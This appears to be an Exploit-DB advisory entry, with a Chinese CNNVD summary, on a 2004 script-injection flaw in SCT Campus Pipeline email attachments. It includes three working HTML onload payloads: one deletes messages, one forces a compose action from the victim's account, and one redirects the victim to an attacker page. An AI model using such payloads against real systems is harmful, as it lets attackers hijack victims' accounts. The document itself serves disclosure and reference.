https://www.exploit-db.com/exploits/24008
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-033

SCTCampusPipeline存在跨站脚本(XSS)漏洞。远程攻击者可以通过电子邮件附件中的onload，onmouseover以及其他Javascript事件注入任意的web脚本或者HTML。

source: http://www.securityfocus.com/bid/10154/info

It has been reported that Campus Pipeline is prone to a remote email attachment script injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied HTML and script code contained in email documents.

This issue may allow a remote attacker to gain control of an unsuspecting user's email account; by executing specific script code an attacker can manipulate the victim's email account. It may be possible for an attacker to steal cookie based authentication credentials as well, and due to the integrated nature of this software this may potentially lead to further compromise of the victim's account. It should be noted that this has not been confirmed.

To delete the current email message:
<html><body onload=?deleteMessage()?></body><html>

This exploit will open a new email message with attacker-supplied text:
<html><body
onload="location.replace('http://www.example.com/cp/email/composeBody?function=new&[email protected]&subject=I
love you matt&body=I was owned by matt')"></body></html>

Site redirection:
<html><body onload="location.replace('http://www.example.com/attackerSpecified.html')">
</body></html>

来源:BID
名称:10154
链接:http://www.securityfocus.com/bid/10154
来源:SECUNIA
名称:11396
链接:http://secunia.com/advisories/11396
来源:XF
名称:sct-campus-attachment-xss(15878)
链接:http://xforce.iss.net/xforce/xfdb/15878
来源:BUGTRAQ
名称:20040415SCTjavascriptexecutionvulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108207280917231&w;=2